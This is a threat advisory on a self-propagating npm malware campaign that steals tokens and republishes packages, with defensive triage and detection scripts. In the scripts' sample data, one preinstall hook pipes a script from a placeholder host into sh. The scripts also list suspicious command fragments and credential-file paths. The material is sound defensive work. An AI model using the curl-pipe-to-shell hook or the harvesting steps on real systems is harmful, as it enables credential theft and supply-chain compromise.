Threat Feed
Advisory severity: high

CanisterSprawl: Self-Propagating npm Malware Campaign

The CanisterSprawl campaign targets npm developers with self-propagating malicious packages that steal tokens, API keys and other sensitive data from developer machines, then use any hijacked npm credentials to publish further malicious packages.

Overview

The CanisterSprawl campaign, first disclosed in April 2026, is self-propagating malware distributed through npm packages. Once running on a developer machine it steals API keys, authentication tokens, crypto wallet data and other secrets from the local environment, then tries to use any npm credentials it finds to publish trojanized versions of the packages the victim is allowed to publish. By abusing trusted credentials, a single compromised machine becomes a source of further malicious packages, and each new victim repeats the cycle. The campaign shows why install-time code execution must be controlled and why unauthorized activity in developer environments needs to be detected quickly.

Attack Chain

  1. A developer installs a malicious npm package from the npm registry, either directly or as a dependency of another package.
  2. During installation, npm runs the package's install lifecycle script (preinstall, install or postinstall), which executes the embedded malware with no further user interaction.
  3. The malware scans the environment variables of the local system for credentials and developer tokens.
  4. It then harvests browser credentials, crypto wallet data and configuration files that contain credentials.
  5. The collected data is exfiltrated to a server controlled by the attacker.
  6. The malware searches the infected machine for an npm automation token, the token type that can publish without an interactive 2FA prompt.
  7. If a token is found, it enumerates every package to which the token grants write (publish) access.
  8. It downloads those packages, injects its own script into them, and republishes them to the npm registry, so that every project that installs the updated packages is infected in turn.
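A defender-side triage script for the attack chain above (and for the later recommendation to review environment variables and local credentials): it is an added example, not code from the advisory or from the campaign. It reports npm tokens in .npmrc, credential-bearing environment variables, and installed packages that run code at install time. The .npmrc text, environment and package.json documents it inspects are constructed sample data, and the secret-name fragments and suspicious command fragments it matches on are this example's own assumptions; on a real host you would feed it the contents of ~/.npmrc, os.environ and the package.json files under node_modules.

```python
"""Triage a developer host for what the attack chain above harvests and abuses.

Added example, not code from the advisory or from the campaign. It checks
npm tokens in .npmrc, credential-bearing environment variables, and installed
packages that run code at install time. All inputs below are constructed
sample data; on a real host pass the contents of ~/.npmrc, os.environ and the
package.json files found under node_modules instead.
"""
import json
import re
from typing import Dict, List

# .npmrc stores registry tokens as "//<registry>/:_authToken=<token>", or as a bare
# "_authToken=" / legacy "_auth=" entry for the default registry.
NPMRC_TOKEN_RE = re.compile(r"^(?://(?P<registry>\S+?)/)?:?(?P<key>_auth(?:Token)?)=(?P<value>\S+)$")

# Name fragments that usually denote a secret (assumption of this example).
SECRET_NAME_PARTS = {"TOKEN", "SECRET", "PASSWORD", "PASSWD", "KEY", "APIKEY", "CREDENTIALS", "AUTH"}
# Known false positives: these hold a path or setting, not a secret.
SECRET_NAME_ALLOWLIST = {"SSH_AUTH_SOCK", "GPG_TTY"}

# npm runs these scripts automatically when a package is installed from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Crude indicators that an install script does more than build a native module.
SUSPICIOUS_COMMAND_PARTS = ("curl", "wget", "base64", "eval", "child_process", "powershell")


def mask(secret: str) -> str:
    """Keep a short prefix so a finding can be matched to a token without printing it."""
    return secret[:4] + "****" if len(secret) > 8 else "****"


def find_npmrc_tokens(npmrc_text: str) -> List[Dict[str, str]]:
    """Return every auth token entry in .npmrc content, with the token value masked."""
    findings = []
    for line in npmrc_text.splitlines():
        m = NPMRC_TOKEN_RE.match(line.strip())
        if m:
            findings.append({"registry": m.group("registry") or "(default registry)",
                             "key": m.group("key"), "value": mask(m.group("value"))})
    return findings


def find_credential_env(env: Dict[str, str]) -> List[str]:
    """Return, sorted, the names of non-empty environment variables that look like secrets."""
    hits = []
    for name, value in env.items():
        if value and name not in SECRET_NAME_ALLOWLIST and set(name.upper().split("_")) & SECRET_NAME_PARTS:
            hits.append(name)
    return sorted(hits)


def find_install_scripts(packages: Dict[str, dict]) -> List[Dict[str, object]]:
    """List install-time lifecycle scripts across installed packages and flag crude indicators."""
    hooks = []
    for name, manifest in sorted(packages.items()):
        scripts = manifest.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                command = scripts[hook]
                hooks.append({"package": name, "hook": hook, "command": command,
                              "indicators": [p for p in SUSPICIOUS_COMMAND_PARTS if p in command.lower()]})
    return hooks


def triage(npmrc_text: str, env: Dict[str, str], packages: Dict[str, dict]) -> Dict[str, object]:
    """Run all three checks and return one report structure."""
    return {"npmrc_tokens": find_npmrc_tokens(npmrc_text),
            "credential_env": find_credential_env(env),
            "install_hooks": find_install_scripts(packages)}


# ---- constructed sample input; none of this comes from a real host ----
SAMPLE_NPMRC = """registry=https://registry.npmjs.org/
//registry.npmjs.org/:_authToken=npm_EXAMPLEtoken0123456789
//npm.pkg.github.com/:_authToken=ghp_EXAMPLEtoken0123456789
always-auth=true
"""
SAMPLE_ENV = {"PATH": "/usr/local/bin:/usr/bin", "HOME": "/home/dev", "LANG": "en_US.UTF-8",
              "SSH_AUTH_SOCK": "/tmp/ssh-agent.sock", "NPM_TOKEN": "npm_EXAMPLEtoken0123456789",
              "GITHUB_TOKEN": "ghp_EXAMPLEtoken0123456789", "AWS_SECRET_ACCESS_KEY": "EXAMPLEsecret0123456789"}
# Minimal package.json documents, as read from node_modules/<name>/package.json.
SAMPLE_PACKAGES = {
    "tiny-formatter": {"version": "2.1.0", "scripts": {"test": "jest"}},
    "native-bindings": {"version": "0.9.3", "scripts": {"install": "node-gyp rebuild"}},
    "helpful-utils": {"version": "1.4.2", "scripts": {"postinstall": "node scripts/postinstall.js"}},
    "totally-legit-colors": {"version": "1.0.1", "scripts": {"preinstall": "curl -s http://example.invalid/s.sh | sh"}},
}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_NPMRC, SAMPLE_ENV, SAMPLE_PACKAGES), indent=2))
```

Every package with an install hook is listed, not only the ones carrying an indicator: a native module running node-gyp is normal, but the list is what you review by hand, and the indicator column only orders the review. Token values are masked in the report so it can be pasted into a ticket.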

Impact

A successful CanisterSprawl infection exfiltrates API keys, authentication tokens and other credentials that can then be used to access internal systems and services. Because the malware republishes packages with stolen publish rights, it spreads through the npm ecosystem and can compromise many projects and developer accounts. Malicious code injected into trusted packages reaches every downstream consumer that updates, a supply chain attack that damages the reputation of the affected developers and organizations and can cause significant financial loss.

Recommendation

  • Remove identified malicious packages immediately, and treat any package version published with a stolen token as malicious until it has been reviewed.
  • Rotate every credential, token and API key that may have been exposed on an affected host, starting with npm tokens, since those are what the malware uses to spread.
  • Review environment variables and local credential files (such as ~/.npmrc) on developer machines for exposure.
  • Audit npm account activity for publishes, token creation or logins that you did not perform.
  • Run installs with lifecycle scripts disabled (npm install --ignore-scripts, or ignore-scripts=true in .npmrc) where the dependency set allows it, since the malware executes from an install script.
  • Deploy the Sigma rules below to detect processes reading credential files and npm publish runs from unusual locations.
  • Enable file integrity monitoring on common credential storage locations and configuration files to detect unauthorized reads and modifications.

Detection coverage (2 rules)

Detect Access to Common Credential Files

medium

Detects processes accessing common credential storage files, which may indicate credential harvesting activity.

Sigma rule. Tactic: credential_access. Technique: T1003. Log sources: file_event (windows).

Detect Suspicious NPM Package Publishing

high

Detects processes running 'npm publish' from unusual working directories, which may indicate a stolen token being used to republish packages.

Sigma rule. Tactic: supply_chain. Technique: T1195. Log sources: process_creation (windows).

Detection queries are kept inside the platform.
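The two rules above, run offline in a small Python re-implementation of the logic their descriptions state. This is an added example, not the platform's Sigma rule content; the events it scores are constructed Sysmon-style records using the Sigma process_creation and file_event field names (Image, CommandLine, CurrentDirectory, TargetFilename), and the credential-file and unusual-directory patterns are this example's own assumptions, which is also where a real rule spends its tuning effort.

```python
"""Offline run of the two detections listed above over constructed telemetry.

Added example: not the platform's Sigma rules, only a re-implementation of
the logic the two descriptions state, applied to Sysmon-style events
constructed for this demo. File and directory patterns are assumptions.
"""
import fnmatch
import re
from typing import Any, Dict, List

RULE_CREDENTIAL_FILES = "Detect Access to Common Credential Files"
RULE_NPM_PUBLISH = "Detect Suspicious NPM Package Publishing"

# Credential stores a harvester reaches for, mapped to the process that legitimately owns
# each one. An empty tuple means no exclusion: node.exe reading ~/.npmrc is both normal npm
# behaviour and exactly what the malware does, which is why this rule is medium and needs triage.
CREDENTIAL_FILES = {
    r"*\.npmrc": (),
    r"*\.git-credentials": ("git.exe",),
    r"*\.aws\credentials": (),
    r"*\.ssh\id_*": (),
    r"*\Google\Chrome\User Data\*\Login Data": ("chrome.exe",),
}

# Working directories from which a genuine developer rarely runs `npm publish`; the malware
# republishes from a scratch location or from inside an installed package.
UNUSUAL_PUBLISH_DIRS = (
    r"*\AppData\Local\Temp\*",
    r"*\Windows\Temp\*",
    r"*\node_modules\*",
    r"*\Downloads\*",
)

# Matches "npm publish", "npm.cmd publish" and a direct npm-cli.js publish invocation.
NPM_PUBLISH_RE = re.compile(r'npm(?:\.cmd|-cli\.js"?)?\s+publish\b', re.IGNORECASE)


def _match(path: str, pattern: str) -> bool:
    """Case-insensitive glob match for Windows paths; fnmatch treats backslash as a literal."""
    return fnmatch.fnmatchcase(path.lower(), pattern.lower())


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def is_credential_file_access(event: Dict[str, Any]) -> bool:
    """Rule 1: a process other than the file's owning application touched a credential store."""
    if event.get("EventType") != "file_event":
        return False
    target = event.get("TargetFilename", "")
    for pattern, owners in CREDENTIAL_FILES.items():
        if _match(target, pattern):
            return _basename(event.get("Image", "")) not in owners
    return False


def is_suspicious_npm_publish(event: Dict[str, Any]) -> bool:
    """Rule 2: an npm publish whose working directory is one developers do not publish from."""
    if event.get("EventType") != "process_creation":
        return False
    if not NPM_PUBLISH_RE.search(event.get("CommandLine", "")):
        return False
    cwd = event.get("CurrentDirectory", "")
    return any(_match(cwd, p) for p in UNUSUAL_PUBLISH_DIRS)


def run_detections(events: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Apply both rules to each event and return the alerts in event order."""
    alerts = []
    for ev in events:
        if is_credential_file_access(ev):
            alerts.append({"rule": RULE_CREDENTIAL_FILES, "severity": "medium", "event_id": ev["EventId"]})
        if is_suspicious_npm_publish(ev):
            alerts.append({"rule": RULE_NPM_PUBLISH, "severity": "high", "event_id": ev["EventId"]})
    return alerts


# ---- constructed sample telemetry; none of this is from a real host ----
NODE = r"C:\Program Files\nodejs\node.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
GIT = r"C:\Program Files\Git\cmd\git.exe"
CMD = r"C:\Windows\System32\cmd.exe"
LOGIN_DATA = r"C:\Users\dev\AppData\Local\Google\Chrome\User Data\Default\Login Data"

SAMPLE_EVENTS = [
    {"EventId": 1, "EventType": "file_event", "Image": CHROME, "TargetFilename": LOGIN_DATA},
    {"EventId": 2, "EventType": "file_event", "Image": NODE, "TargetFilename": LOGIN_DATA},
    {"EventId": 3, "EventType": "file_event", "Image": NODE, "TargetFilename": r"C:\Users\dev\.npmrc"},
    {"EventId": 4, "EventType": "file_event", "Image": GIT, "TargetFilename": r"C:\Users\dev\.git-credentials"},
    {"EventId": 5, "EventType": "file_event", "Image": NODE, "TargetFilename": r"C:\Users\dev\projects\app\src\index.js"},
    {"EventId": 6, "EventType": "process_creation", "Image": CMD, "CommandLine": "cmd.exe /c npm publish",
     "CurrentDirectory": r"C:\Users\dev\projects\app"},
    {"EventId": 7, "EventType": "process_creation", "Image": CMD, "CommandLine": "cmd.exe /d /s /c npm publish --access public",
     "CurrentDirectory": r"C:\Users\dev\AppData\Local\Temp\repack\tiny-formatter"},
    {"EventId": 8, "EventType": "process_creation", "Image": NODE,
     "CommandLine": r'node "C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js" publish',
     "CurrentDirectory": r"C:\Users\dev\projects\app\node_modules\helpful-utils"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(f'[{alert["severity"]}] {alert["rule"]}: event {alert["event_id"]}')
```

Events 1 and 4 show the owning-application exclusion (Chrome reading its own Login Data, git reading .git-credentials), event 3 shows the noise the medium severity reflects (node.exe reading .npmrc happens on every npm install), and event 6 is a publish from an ordinary project directory that the second rule deliberately leaves alone.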